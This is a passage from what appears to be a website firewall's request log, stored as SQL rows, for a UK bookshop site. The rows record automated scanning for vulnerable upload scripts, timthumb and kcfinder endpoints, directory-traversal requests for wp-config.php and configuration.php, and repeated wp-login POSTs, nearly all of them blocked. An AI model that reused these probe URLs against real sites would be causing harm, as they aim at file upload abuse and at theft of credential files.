21.216',1773999576,'','https://ashbooks.co.uk/getsimple/plugins/items/uploader/server/php.php','','{\"1\":\"python-requests\\/2.26.0\"}','jpTHZQC4Ne6U2uGhzoFx9gml',0,1638380461.4596,388,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/novi/admin/engine/lib/valums/server/php.php','','{\"1\":\"python-requests\\/2.26.0\"}','SPkOyBa1EmDVsRhHCGX2I3ZW',0,1638380462.4819,422,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php','','{\"1\":\"python-requests\\/2.26.0\"}','oY9uS7jrCQFqtdMA85caRPT1',0,1638380463.4699,402,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/modules/hdi/hdi-tinymce/tiny_mce4/plugins/moxiemanager/api.php?action=upload&path=%2Ffiles','','{\"1\":\"python-requests\\/2.26.0\"}','538mO7gMpTdCnYJXhlLuAvix',0,1638380467.5209,397,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php','','{\"1\":\"python-requests\\/2.26.0\"}','kqOXboGMapIsU5w017tP9hBl',0,1638380468.4094,431,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-login.php?redirect_to=https%3A%2F%2Fashbooks.co.uk%2Fwp-admin%2Fadmin.php%3Fpage%3Dimage-news-slider_manage&reauth=1','','{\"1\":\"python-requests\\/2.26.0\"}','RAmsfd7869CPVLpYZgJ5tNab',0,1638380471.1018,416,'','GET',404,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','LMJa2uA1DB5Pw3m4oeypjfYs',0,1638380472.1937,398,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/js/swfupload/js/upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','iRHw9GAnspULKej3aPfYXzZS',0,1638380473.1589,440,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/plugins/dreamworkgallery/js/swfupload/js/upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','aqUfx8mQcWAY2TKMzuBhn7V6',0,1638380474.3737,719,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','','{\"1\":\"python-requests\\/2.26.0\"}','eTkfyXc23EI5wohAVg1Bis6K',0,1638380475.6555,139,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/newspro/timthumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','43DhlFjdKpikYvsxucWJ9rTn',0,1638380476.3216,394,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/admin/timthumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','YOvgFhf3XyACmZzNiL8kxwa7',0,1638380477.3006,399,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','','{\"1\":\"python-requests\\/2.26.0\"}','1NoO6YLsagMy4Z7pjfEenHzA',0,1638380478.4780,387,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/include/swf_upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','W3c5rgFvNd6YtGpQjhw1bknO',0,1638380479.5334,408,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-login.php?redirect_to=https%3A%2F%2Fashbooks.co.uk%2Fwp-admin%2Fadmin.php%3Fpath%3D..%2F..%2F..%2Fwp-config.php%26bundle%3Dtwentynineteen%26domain%3Dtwentynineteen%26page%3Dloco-theme%26action%3Dfile-view&reauth=1','','{\"1\":\"python-requests\\/2.26.0\"}','unoFdmPwhyjG2I6kbZrzJAi8',0,1638380482.3306,180,'','GET',404,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/plugins/sell-downloads/sell-downloads.php?file=../../../../../../../../.././wp-config.php%00','','{\"1\":\"python-requests\\/2.26.0\"}','Yu6XjFawmtoR4cnVGs51JIbZ',0,1638380483.2029,409,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php','','{\"1\":\"python-requests\\/2.26.0\"}','DHho5jOyvSb0nmfkRzpu2c3Y',0,1638380484.2510,379,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-config.php.bak','','{\"1\":\"python-requests\\/2.26.0\"}','q7xVPyw98mNQcXdSu2naZpjG',0,1638380486.2803,428,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php','','{\"1\":\"python-requests\\/2.26.0\"}','JgcECD2IaXAY1QswqVoBGxkm',0,1638380487.9933,841,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/include/config.php.bak','','{\"1\":\"python-requests\\/2.26.0\"}','o1E205HMhNgXZvfWe6LTyibp',0,1638380491.2830,382,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-config.php.000','','{\"1\":\"python-requests\\/2.26.0\"}','VGRvhY3jMHB2OCNdsP94kaqg',0,1638380492.1693,387,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/include/config.php.000','','{\"1\":\"python-requests\\/2.26.0\"}','UTme8sxXF0uMzZDdf2KG9JbE',0,1638380493.0653,417,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/templates/default/jQuery-File-Upload/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','mfpQVoLwqzYglRe95xTdWJ1A',0,1638380494.0465,371,'','GET',403,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','qUzyL4f1atXM3pv52kNAihZE',0,1638380494.6073,204,'','POST',403,0,600,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','NfpaqOXVl21iEAQegukwBG8L',0,1638380494.9199,130,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/theme/plugins/jquery-file-upload/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','SZ5YBfqdkGVet4WAKHjDTu7U',0,1638380495.6569,233,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/public/theme/server/fileupload/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','fUD0Ra7SWcdVtsY5g2CGh1Mb',0,1638380496.5164,177,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/assets/js/bluimp/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','t21e06IvUT9ViNHLf3pBWy7K',0,1638380497.2766,394,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-contacts.php','','{\"1\":\"python-requests\\/2.26.0\"}','7L0QOFhRf5nyIX6Buz2Aa9Hx',0,1638380503.4184,121,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/address.php','','{\"1\":\"python-requests\\/2.26.0\"}','QVrypMuHOAS5jfWvIhPL0Uci',0,1638380504.1013,397,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/cmd.php','','{\"1\":\"python-requests\\/2.26.0\"}','lRbhzQLSIuO3XMxVAYEWdtN0',0,1638380505.6905,583,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/options.php','','{\"1\":\"python-requests\\/2.26.0\"}','ND8XLf4egsbqhxK9mwHSP0VT',0,1638380507.1784,143,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php','','{\"1\":\"python-requests\\/2.26.0\"}','ktTVP2J7cZqEdGgyoQCHxzm4',0,1638380507.8540,345,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/phpminiadmin.php','','{\"1\":\"python-requests\\/2.26.0\"}','hr2XHpiclbqDg98eN54mYB1A',0,1638380508.7789,317,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/plugins/jquery-file-upload/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','r7Ijng9KAZ6sU4RMibL3xQSt',0,1638380509.6594,174,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/admin/jQuery-File-Upload/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','xXkKD9M2RtYn4Op0eN7BSzWl',0,1638380511.9310,409,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/assets/plugins/jQuery-File-Upload/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','5mg07luM4XhkxKCHPNWpSGye',0,1638380513.6702,416,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/assets/admin/plugins/jQuery-File-Upload/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','zoWIQu7aOSVjMPtAcebF0ldK',0,1638380514.7625,172,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/assets/global/plugins/jQuery-File-Upload/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','MaE8meupqzUQKHcrVBJRLb0G',0,1638380515.5350,163,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/assets/global/plugins/File-Upload/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','rnvWhj8BRHzeLgV0YCIGyq1o',0,1638380516.3404,413,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','8hHqEfCbP5KykD0G7tdnioNI',0,1638380518.9740,409,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/File-Upload/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','o34BMqVudJ91PmSA0ZjI8Wie',0,1638380520.0001,412,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/thumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','mEHDa3viOK1LyQnFAMPJzkdc',0,1638380523.1264,391,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/tt.php','','{\"1\":\"python-requests\\/2.26.0\"}','d7gJF6KOh3HRITSEG5r4mjD8',0,1638380525.0773,492,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/TimThumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','gTF58iVI16ZBMuHPxhRfr0Un',0,1638380526.0632,333,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/bigfeature/library/timthumb/timthumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','b4kO7l6xU0dG5t39FWeayXhZ',0,1638380527.0360,410,'','GET',403,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','SlhV3XcgTwjesBbUpHEDunZ9',0,1638380527.8225,173,'','POST',404,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/timthumb/timthumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','eoS38bpK6I5fyUJNYRlDxrGk',0,1638380528.0825,328,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/timthumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','V3I06fEFvNHJXgU52ta1hqrl',0,1638380528.9755,488,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/jQuery-File-Upload/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','9S37uX2YEUWz6cMrlxG0m1hw',0,1638380530.6630,188,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/kcfinder/css.php','','{\"1\":\"python-requests\\/2.26.0\"}','CmhGL1NrQaiJsXcwTIxo7uWk',0,1638380533.2505,150,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/admin/kcfinder/css.php','','{\"1\":\"python-requests\\/2.26.0\"}','PO5TDGSbmrfHVXzCaMwEyB8h',0,1638380533.9223,129,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/panel/kcfinder/css.php','','{\"1\":\"python-requests\\/2.26.0\"}','Hr95tSmQDVhPyRw4Xx2YojlG',0,1638380534.6192,375,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/asset/kcfinder/css.php','','{\"1\":\"python-requests\\/2.26.0\"}','jNgCTUHznoE1OAhQr9uLat2f',0,1638380535.5894,128,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/js/kcfinder/css.php','','{\"1\":\"python-requests\\/2.26.0\"}','0tRd8AnjMgTwL59CBGKJFzvq',0,1638380536.2466,385,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/administrator/kcfinder/css.php','','{\"1\":\"python-requests\\/2.26.0\"}','QMv5hZIwtHgJkdoWDLlprGF8',0,1638380537.2590,373,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/plugins/kcfinder/css.php','','{\"1\":\"python-requests\\/2.26.0\"}','DAQKp1bqXEksnSuv8NwoM2mc',0,1638380538.1939,369,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/versatile/lib/includes/timthumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','HrVADSBceT7wCkJNGf4gnZaL',0,1638380539.3212,361,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/bigfeature/library/timthumb/timthumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','OmjPEWBGZp4rqzDN70nQkbiy',0,1638380540.3093,370,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/modularity/includes/timthumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','aqydC076FNxiTJOz4WrZMvIU',0,1638380541.2488,867,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/plugins/wp-checkout.bk/vendors/timthumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','teQmXcu8qIafV5h4Z1JMiBls',0,1638380543.0371,1103,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/plugins/wp-checkout/vendors/timthumb.php','','{\"1\":\"python-requests\\/2.26.0\"}','mXQ70gvUBM5pFL4arH2jOZ6x',0,1638380544.8740,132,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/blog/wp-admin/install.php?step=1','','{\"1\":\"python-requests\\/2.26.0\"}','lN2OXmfUbStB9vj3WLIqThe8',0,1638380545.5690,375,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wpnew/wp-admin/install.php?step=1','','{\"1\":\"python-requests\\/2.26.0\"}','ZzyK45vHso6R2w1YqiW3x8gJ',0,1638380546.5362,383,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/new/wp-admin/install.php?step=1','','{\"1\":\"python-requests\\/2.26.0\"}','Beh16DiuRvYILzrkxmScJ3qG',0,1638380548.2230,131,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/newsite/wp-admin/install.php?step=1','','{\"1\":\"python-requests\\/2.26.0\"}','j6IdUQDLw4x9AbpVau1YRvsn',0,1638380548.8625,129,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wordpress/wp-admin/install.php?step=1','','{\"1\":\"python-requests\\/2.26.0\"}','POuAp6dTjfwEI7x8Kg9bQ3GN',0,1638380549.5739,129,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp/wp-admin/install.php?step=1','','{\"1\":\"python-requests\\/2.26.0\"}','KjcASMIi739yRDog6tUdZsBF',0,1638380550.3802,158,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/js/tinymce1/plugins/filemanager/language/index.php?type=fm','','{\"1\":\"python-requests\\/2.26.0\"}','jW4xU50s9PzJ2i1cTRrkYNue',0,1638380552.1220,346,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/tinymce/plugins/filemanager/language/index.php?type=fm','','{\"1\":\"python-requests\\/2.26.0\"}','p5VoRrhwMa3NQOct7mTvKiGA',0,1638380553.0041,392,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/tinymce/plugins/imagemanager/language/index.php?type=fm','','{\"1\":\"python-requests\\/2.26.0\"}','ZY6jCXb8RITHdlWPS2KF4ike',0,1638380553.9579,385,'','GET',403,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','mElzAvtwITZUrMFjNnC5iaxS',0,1638380562.1832,130,'','POST',404,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/modules/megaproduct/upload/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','IeojfbzqBRSJhwLym83vs2a5',0,1638380575.5673,128,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/js/tinymce4/js/tinymce/plugins/moxiemanager/api.php?action=upload&path=%2Ffiles','','{\"1\":\"python-requests\\/2.26.0\"}','16cH2YKhTls3PfiryJOGx9oC',0,1638380576.5118,193,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/tinymce/plugins/moxiemanager/api.php?action=upload&path=%2Ffiles','','{\"1\":\"python-requests\\/2.26.0\"}','fnSRZv9A3oquHFCsGDMeJUwE',0,1638380577.3925,1181,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/js/tinymce/plugins/moxiemanager/api.php?action=upload&path=%2Ffiles','','{\"1\":\"python-requests\\/2.26.0\"}','pL12rWyB5deZsbm4YoGITXEK',0,1638380579.7618,542,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/plugins/vmcustom/photoupload/assets/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','GJfZBhen5VAFWpsIYlcrQ734',0,1638380581.7619,165,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/js/server/php/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','GYrdiO5couP2fB8xgJ3n7AsX',0,1638380584.2225,386,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/index.php?option=com_myblog&task=ajaxupload','','{\"1\":\"python-requests\\/2.26.0\"}','3D0NMaUdi7cOCFvJKPb5TS4l',0,1638380587.4304,499,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','{\"1\":\"python-requests\\/2.26.0\"}','zeQFZEpBWrHjLgob6UV5COM9',0,1638380589.5909,372,'','GET',403,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','9omzKYXU5wG8MDQlyL6nO72p',0,1638380601.0544,384,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','RI1LuZrOk0zyaUKv6wn7TBhs',0,1638380640.5714,144,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','B8DGCMVjwqAKoLFxlZrzaNWs',0,1638380679.2876,378,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','PdNBzl1s2OnSZ4pcHqJxYUtw',0,1638380718.7398,472,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','skAtr5Mjmoq0h9IURNEO4vpz',0,1638380756.2858,376,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','Qs81gE5W3l2YPrSdxUM4Ko96',0,1638380794.9875,432,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','O1Rz4VKNFG75uXx20QfeYBb9',0,1638380841.9906,401,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','10ONHMIcjDWY2tkgETlQiGRA',0,1638380884.9161,459,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','2OvTh38LyHknwl90X75FCMiW',0,1638380931.6716,387,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','HtRYx1rfPdz6sWTe48JZSBEC',0,1638381000.1551,1034,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','AwMcGUTfkYKxatZ1X2DReHWQ',0,1638381041.7917,163,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','MNCAStOrq7Q2azcVnbW9ZlTe',0,1638381099.5884,148,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','10LimwxVIEbOt8zWAsjodZBn',0,1638381148.6957,739,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','NxCf6acKEGLUQ2wmYJ0P5T4t',0,1638381192.1223,486,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','Cl50J9SrbfsKaYFIApRy8EO1',0,1638381251.4054,402,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','WR86sE3bHvqMFGCNZ4T2lAVK',0,1638381293.6611,379,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','94MibO3L2HDpsIEe7BP8l1zF',0,1638381340.1310,413,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','7o9tsaqPYpGwASbNdQfO5DFW',0,1638381381.4143,430,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','rzws5vZjXDyGqcag2o10fK8W',0,1638381427.2366,620,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','42dBl967IzouD5CvMp8KNgqx',0,1638381474.7665,169,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','78FU5ZSqWhtdMEuyx21XvBIw',0,1638381517.9263,163,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','JsbUBGSVjMl19zfPDdQnRZKO',0,1638381557.7638,391,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','w9qgE4MRJi1eX3a5rHCpYbDf',0,1638381599.1277,366,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','ZpUauOTRYbmtDlHPqXoijF36',0,1638381643.4812,414,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','HtrkmveBfG83qiSaLTEnK2RU',0,1638381686.7163,822,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','xGUId9moJn5LPf2juZWMaNTQ',0,1638381728.4952,391,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','BVai4SyJQw7CWLuUZYFrP5bX',0,1638381769.4288,413,'','POST',404,0,700,0,1,'',0),('44.232.212.251',753456379,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','dxZ7AveHT82nyi4zkMotNpfR',0,1638381791.6192,434,'','GET',403,0,520,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','IQK3GFmrHM216ALVlOJX0Rp5',0,1638381810.3902,377,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','2AHYVNtTrG8jsxSeMaB3hu09',0,1638381850.6369,378,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','NX31l5BmTdZFkSMzwKWusHaV',0,1638381891.0005,428,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','WT8eAIPSKJBqc0vRkxsOuEiQ',0,1638381934.5807,183,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','7i6fO3pAsBIFChTQHK0oz4Jj',0,1638381977.1927,356,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','peu7aDtQvMhYALS10R9zjxrH',0,1638382021.9799,380,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','vikxcwy2ZKVG9mTJqFDSsIP4',0,1638382066.9433,387,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','0X9lHqtYWApOuNBzFkr6xcI2',0,1638382108.4974,148,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','8yf0nea94RoIDviGFjpcVOSU',0,1638382149.4168,410,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','6VxkMwWGErd9J5v4Zjens7QC',0,1638382191.7899,381,'','POST',404,0